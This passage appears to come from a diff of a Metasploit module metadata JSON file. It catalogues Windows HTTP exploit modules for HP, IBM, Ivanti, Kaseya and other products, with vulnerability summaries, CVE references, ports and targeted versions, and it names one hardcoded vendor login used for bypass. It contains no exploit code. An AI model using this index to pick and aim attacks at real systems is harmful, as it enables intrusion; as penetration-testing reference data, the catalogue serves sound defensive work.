This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.", + "references": [ + "CVE-2013-4812", + "OSVDB-97155", + "BID-62348", + "ZDI-13-225" + ], + "platform": "Windows", + "arch": "java", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP ProCurve Manager 4.0 SNAC Server" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_pcm_snac_update_certificates", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_pcm_snac_update_domain": { + "name": "HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload", + "fullname": "exploit/windows/http/hp_pcm_snac_update_domain", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-09-09", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateDomainControllerServlet allows an attacker to upload arbitrary\n files, just having into account binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. 
This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.", + "references": [ + "CVE-2013-4811", + "OSVDB-97154", + "BID-62349", + "ZDI-13-226" + ], + "platform": "Windows", + "arch": "java", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP ProCurve Manager 4.0 SNAC Server" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_pcm_snac_update_domain", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_power_manager_filename": { + "name": "HP Power Manager 'formExportDataLogs' Buffer Overflow", + "fullname": "exploit/windows/http/hp_power_manager_filename", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-10-19", + "type": "exploit", + "author": [ + "Alin Rad Pop", + "Rodrigo Escobar ", + "sinn3r " + ], + "description": "This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'.\n By creating a malformed request specifically for the fileName parameter, a stack-based\n buffer overflow occurs due to a long error message (which contains the fileName),\n which may result in arbitrary remote code execution under the context of 'SYSTEM'.", + "references": [ + "CVE-2009-3999", + "OSVDB-61848", + "BID-37867" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP3 / Win Server 2003 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_power_manager_filename.rb", + "is_install_path": true, + "ref_name": 
"windows/http/hp_power_manager_filename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_power_manager_login": { + "name": "Hewlett-Packard Power Manager Administration Buffer Overflow", + "fullname": "exploit/windows/http/hp_power_manager_login", + "aliases": [], + "rank": 200, + "disclosure_date": "2009-11-04", + "type": "exploit", + "author": [ + "MC ", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2.\n Sending a specially crafted POST request with an overly long Login string, an\n attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2009-2685", + "OSVDB-59684" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_power_manager_login.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_power_manager_login", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_sitescope_dns_tool": { + "name": "HP SiteScope DNS Tool Command Injection", + "fullname": "exploit/windows/http/hp_sitescope_dns_tool", + "aliases": [], + "rank": 400, + "disclosure_date": "2015-10-09", + "type": "exploit", + "author": [ + "Kirk Hayes", + "Charles Riggs", + "Juan Vazquez" + ], + "description": "This module exploits a command injection vulnerability\n discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26\n and 11.30). The vulnerability exists in the DNS Tool allowing an\n attacker to execute arbitrary commands in the context of the service. 
By\n default, HP SiteScope installs and runs as SYSTEM in Windows and does\n not require authentication. This vulnerability only exists on the\n Windows version. The Linux version is unaffected.", + "references": [ + "URL-https://www.rapid7.com/blog/post/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection", + "URL-http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP SiteScope 11.30 / Microsoft Windows 7 and higher", + "HP SiteScope 11.30 / CMD" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/http/hp_sitescope_dns_tool.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_sitescope_dns_tool", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_sitescope_runomagentcommand": { + "name": "HP SiteScope Remote Code Execution", + "fullname": "exploit/windows/http/hp_sitescope_runomagentcommand", + "aliases": [], + "rank": 0, + "disclosure_date": "2013-07-29", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a code execution flaw in HP SiteScope.\n The vulnerability exists in the opcactivate.vbs script, which\n is reachable from the APIBSMIntegrationImpl AXIS service, and\n uses WScript.Shell.run() to execute cmd.exe with user provided\n data. Note that the opcactivate.vbs component is installed\n with the (optional) HP Operations Agent component. 
The module\n has been tested successfully on HP SiteScope 11.20 (with HP\n Operations Agent) over Windows 2003 SP2.", + "references": [ + "CVE-2013-2367", + "OSVDB-95824", + "BID-61506", + "ZDI-13-205" + ], + "platform": "Windows", + "arch": "x86", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_sitescope_runomagentcommand", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hpe_sim_76_amf_deserialization": { + "name": "HPE Systems Insight Manager AMF Deserialization RCE", + "fullname": "exploit/windows/http/hpe_sim_76_amf_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-12-15", + "type": "exploit", + "author": [ + "Harrison Neal", + "Jang", + "Grant Willcox" + ], + "description": "A remotely exploitable vulnerability exists within HPE System Insight Manager (SIM) version 7.6.x that can be\n leveraged by a remote unauthenticated attacker to execute code within the context of HPE System Insight\n Manager's hpsimsvc.exe process, which runs with administrative privileges. The vulnerability occurs due\n to a failure to validate data during the deserialization process when a user submits a POST request to\n the /simsearch/messagebroker/amfsecure page. 
This module exploits this vulnerability by leveraging an\n outdated copy of Commons Collection, namely 3.2.2, that ships with HPE SIM, to gain\n RCE as the administrative user running HPE SIM.", + "references": [ + "CVE-2020-7200", + "URL-https://testbnull.medium.com/hpe-system-insight-manager-sim-amf-deserialization-lead-to-rce-cve-2020-7200-d49a9cf143c0", + "URL-https://www.zerodayinitiative.com/advisories/ZDI-20-1449/", + "URL-https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04068en_us" + ], + "platform": "Windows", + "arch": "", + "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Powershell" + ], + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/http/hpe_sim_76_amf_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/httpdx_handlepeer": { + "name": "HTTPDX h_handlepeer() Function Buffer Overflow", + "fullname": "exploit/windows/http/httpdx_handlepeer", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-10-08", + "type": "exploit", + "author": [ + "Pankaj Kohli ", + "Trancer ", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. 
The\n vulnerability is caused due to a boundary error within the \"h_handlepeer()\" function in http.cpp.\n By sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code.", + "references": [ + "OSVDB-58714", + "CVE-2009-3711", + "URL-http://www.pank4j.com/exploits/httpdxb0f.php", + "URL-http://www.rec-sec.com/2009/10/16/httpdx-buffer-overflow-exploit/" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "httpdx 1.4 - Windows XP SP3 English", + "httpdx 1.4 - Windows 2003 SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/httpdx_handlepeer.rb", + "is_install_path": true, + "ref_name": "windows/http/httpdx_handlepeer", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/httpdx_tolog_format": { + "name": "HTTPDX tolog() Function Format String Vulnerability", + "fullname": "exploit/windows/http/httpdx_tolog_format", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-11-17", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a format string vulnerability in HTTPDX HTTP server.\n By sending a specially crafted HTTP request containing format specifiers, an\n attacker can corrupt memory and execute arbitrary code.\n\n By default logging is off for HTTP, but enabled for the 'moderator' user\n via FTP.", + "references": [ + "CVE-2009-4769", + "OSVDB-60182" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "httpdx 1.4 - Windows XP SP3 English", + "httpdx 1.4.5 - 
Windows XP SP3 English", + "httpdx 1.4.6 - Windows XP SP3 English", + "httpdx 1.4.6b - Windows XP SP3 English", + "httpdx 1.5 - Windows XP SP3 English", + "Debug target" + ], + "mod_time": "2023-05-30 10:56:41 +0000", + "path": "/modules/exploits/windows/http/httpdx_tolog_format.rb", + "is_install_path": true, + "ref_name": "windows/http/httpdx_tolog_format", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ia_webmail": { + "name": "IA WebMail 3.x Buffer Overflow", + "fullname": "exploit/windows/http/ia_webmail", + "aliases": [], + "rank": 200, + "disclosure_date": "2003-11-03", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This exploits a stack buffer overflow in the IA WebMail server.\n This exploit has not been tested against a live system at\n this time.", + "references": [ + "CVE-2003-1192", + "OSVDB-2757", + "BID-8965", + "URL-http://www.k-otik.net/exploits/11.19.iawebmail.pl.php" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "IA WebMail 3.x" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ia_webmail.rb", + "is_install_path": true, + "ref_name": "windows/http/ia_webmail", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ibm_tivoli_endpoint_bof": { + "name": "IBM Tivoli Endpoint Manager POST Query Buffer Overflow", + "fullname": "exploit/windows/http/ibm_tivoli_endpoint_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-05-31", + "type": "exploit", + "author": [ + "bannedit ", + "Jeremy Brown <0xjbrown@gmail.com>" + ], + "description": "This module exploits a stack based buffer 
overflow in the way IBM Tivoli\n Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query\n arguments.\n\n This issue can be triggered by sending a specially crafted HTTP POST request to\n the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization\n is required. This exploit makes use of a second vulnerability, a hardcoded account\n (tivoli/boss) is used to bypass the authorization restriction.", + "references": [ + "CVE-2011-1220", + "OSVDB-72713", + "OSVDB-72751", + "BID-48049", + "ZDI-11-169" + ], + "platform": "Windows", + "arch": "", + "rport": 9495, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Windows Server 2003 SP0", + "Windows Server 2003 SP1", + "Windows Server 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/ibm_tivoli_endpoint_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ibm_tpmfosd_overflow": { + "name": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow", + "fullname": "exploit/windows/http/ibm_tpmfosd_overflow", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-05-02", + "type": "exploit", + "author": [ + "toto" + ], + "description": "This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\n for OS Deployment version 5.1.0.X.", + "references": [ + "CVE-2007-1868", + "OSVDB-34678", + "BID-23264", + "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-05" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + 
"TPMfOSD 5.1 (Windows 2000 SP4 - English)", + "TPMfOSD 5.1 (Windows 2003 All - English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/ibm_tpmfosd_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ibm_tsm_cad_header": { + "name": "IBM Tivoli Storage Manager Express CAD Service Buffer Overflow", + "fullname": "exploit/windows/http/ibm_tsm_cad_header", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-09-24", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).\n By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.", + "references": [ + "CVE-2007-4880", + "OSVDB-38161", + "BID-25743" + ], + "platform": "Windows", + "arch": "", + "rport": 1581, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IBM Tivoli Storage Manager Express 5.3.3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ibm_tsm_cad_header.rb", + "is_install_path": true, + "ref_name": "windows/http/ibm_tsm_cad_header", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/icecast_header": { + "name": "Icecast Header Overwrite", + "fullname": "exploit/windows/http/icecast_header", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-09-28", + "type": "exploit", + "author": [ + "spoonm ", + "Luigi Auriemma " + ], + "description": "This module exploits a buffer overflow in the header parsing of icecast\n versions 2.0.1 and earlier, discovered by Luigi Auriemma. 
Sending 32\n HTTP headers will cause a write one past the end of a pointer array. On\n win32 this happens to overwrite the saved instruction pointer, and on\n linux (depending on compiler, etc) this seems to generally overwrite\n nothing crucial (read not exploitable).\n\n This exploit uses ExitThread(), this will leave icecast thinking the\n thread is still in use, and the thread counter won't be decremented.\n This means for each time your payload exits, the counter will be left\n incremented, and eventually the threadpool limit will be maxed. So you\n can multihit, but only till you fill the threadpool.", + "references": [ + "CVE-2004-1561", + "OSVDB-10406", + "BID-11271", + "URL-http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html" + ], + "platform": "Windows", + "arch": "", + "rport": 8000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/icecast_header.rb", + "is_install_path": true, + "ref_name": "windows/http/icecast_header", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/integard_password_bof": { + "name": "Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow", + "fullname": "exploit/windows/http/integard_password_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-09-07", + "type": "exploit", + "author": [ + "Lincoln", + "Nullthreat", + "rick2600", + "corelanc0d3r ", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Race river's Integard Home/Pro\n internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are\n vulnerable.\n\n The administration web page on port 18881 is vulnerable to a remote buffer overflow\n attack. 
By sending a long character string in the password field, both the structured\n exception handler and the saved extended instruction pointer are over written, allowing\n an attacker to gain control of the application and the underlying operating system\n remotely.\n\n The administration website service runs with SYSTEM privileges, and automatically\n restarts when it crashes.", + "references": [ + "OSVDB-67909", + "URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061" + ], + "platform": "Windows", + "arch": "", + "rport": 18881, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "Integard Home 2.0.0.9021", + "Integard Pro 2.2.0.9026" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/integard_password_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/integard_password_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/intersystems_cache": { + "name": "InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow", + "fullname": "exploit/windows/http/intersystems_cache", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-09-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in InterSystems Cache 2009.1.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.", + "references": [ + "OSVDB-60549", + "BID-37177" + ], + "platform": "Windows", + "arch": "", + "rport": 57772, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 
"/modules/exploits/windows/http/intersystems_cache.rb", + "is_install_path": true, + "ref_name": "windows/http/intersystems_cache", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/intrasrv_bof": { + "name": "Intrasrv 1.0 Buffer Overflow", + "fullname": "exploit/windows/http/intrasrv_bof", + "aliases": [], + "rank": 0, + "disclosure_date": "2013-05-30", + "type": "exploit", + "author": [ + "xis_one", + "PsychoSpy " + ], + "description": "This module exploits a boundary condition error in Intrasrv Simple Web\n Server 1.0. The web interface does not validate the boundaries of an\n HTTP request string prior to copying the data to an insufficiently sized\n buffer. Successful exploitation leads to arbitrary remote code execution\n in the context of the application.", + "references": [ + "OSVDB-94097", + "EDB-18397", + "BID-60229" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "v1.0 - XP / Win7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/intrasrv_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/intrasrv_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ipswitch_wug_maincfgret": { + "name": "Ipswitch WhatsUp Gold 8.03 Buffer Overflow", + "fullname": "exploit/windows/http/ipswitch_wug_maincfgret", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-08-25", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. 
By\n posting a long string for the value of 'instancename' in the _maincfgret.cgi\n script an attacker can overflow a buffer and execute arbitrary code on the system.", + "references": [ + "CVE-2004-0798", + "OSVDB-9177", + "BID-11043" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "WhatsUP Gold 8.03 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb", + "is_install_path": true, + "ref_name": "windows/http/ipswitch_wug_maincfgret", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ivanti_avalanche_filestoreconfig_upload": { + "name": "Ivanti Avalanche FileStoreConfig File Upload", + "fullname": "exploit/windows/http/ivanti_avalanche_filestoreconfig_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-04-24", + "type": "exploit", + "author": [ + "Piotr Bazydlo", + "Shelby Pace" + ], + "description": "Ivanti Avalanche prior to v6.4.0.186 permits MS-DOS style short\n names in the configuration path for the Central FileStore. 
Because of\n this, an administrator can change the default path to the web root\n of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\\SYSTEM.", + "references": [ + "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-456/", + "URL-https://forums.ivanti.com/s/article/ZDI-CAN-17812-Ivanti-Avalanche-FileStoreConfig-Arbitrary-File-Upload-Remote-Code-Execution-Vulnerability?language=en_US", + "URL-https://attackerkb.com/topics/jcdcN9SN9V/cve-2023-28128", + "CVE-2023-28128" + ], + "platform": "Java,Windows", + "arch": "java", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2023-05-12 16:08:47 +0000", + "path": "/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/ivanti_avalanche_filestoreconfig_upload", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/ivanti_epm_recordgoodapp_sqli_rce": { + "name": "Ivanti EPM RecordGoodApp SQLi RCE", + "fullname": "exploit/windows/http/ivanti_epm_recordgoodapp_sqli_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-05-24", + "type": "exploit", + "author": [ + "James Horseman", + "Christophe De La Fuente" + ], + "description": "Ivanti Endpoint Manager (EPM) 2022 SU5 and prior are vulnerable to unauthenticated SQL injection which can be leveraged to achieve unauthenticated remote code execution.", + "references": [ + "URL-https://forums.ivanti.com/s/article/Security-Advisory-May-2024", + "URL-https://www.zerodayinitiative.com/advisories/ZDI-24-507", + 
"URL-https://github.com/horizon3ai/CVE-2024-29824", + "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/", + "CVE-2024-29824" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2024-06-21 10:13:08 +0000", + "path": "/modules/exploits/windows/http/ivanti_epm_recordgoodapp_sqli_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/ivanti_epm_recordgoodapp_sqli_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/jira_collector_traversal": { + "name": "JIRA Issues Collector Directory Traversal", + "fullname": "exploit/windows/http/jira_collector_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-02-26", + "type": "exploit", + "author": [ + "Philippe Arteau", + "juan vazquez " + ], + "description": "This module exploits a directory traversal flaw in JIRA 6.0.3. The vulnerability exists\n in the issues collector code, while handling attachments provided by the user. It can be\n exploited in Windows environments to get remote code execution. 
This module has been tested\n successfully on JIRA 6.0.3 with Windows 2003 SP2 Server.", + "references": [ + "CVE-2014-2314", + "OSVDB-103807", + "BID-65849", + "URL-https://confluence.atlassian.com/display/JIRA/JIRA+Security+Advisory+2014-02-26", + "URL-http://blog.h3xstream.com/2014/02/jira-path-traversal-explained.html" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Jira 6.0.3 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/jira_collector_traversal.rb", + "is_install_path": true, + "ref_name": "windows/http/jira_collector_traversal", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/kaseya_uploader": { + "name": "Kaseya VSA uploader.aspx Arbitrary File Upload", + "fullname": "exploit/windows/http/kaseya_uploader", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-09-23", + "type": "exploit", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions\n between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary\n directory leading to arbitrary code execution with IUSR privileges. 
This module has been\n tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.", + "references": [ + "CVE-2015-6922", + "ZDI-15-449", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Kaseya/kaseya-vsa-vuln-2.txt", + "URL-https://seclists.org/bugtraq/2015/Sep/132" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Kaseya VSA v7 to v9.1" + ], + "mod_time": "2022-01-13 18:47:11 +0000", + "path": "/modules/exploits/windows/http/kaseya_uploader.rb", + "is_install_path": true, + "ref_name": "windows/http/kaseya_uploader", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/kaseya_uploadimage_file_upload": { + "name": "Kaseya uploadImage Arbitrary File Upload", + "fullname": "exploit/windows/http/kaseya_uploadimage_file_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-11-11", + "type": "exploit", + "author": [ + "Thomas Hibbert " + ], + "description": "This module exploits an arbitrary file upload vulnerability found in Kaseya versions below\n 6.3.0.2. 
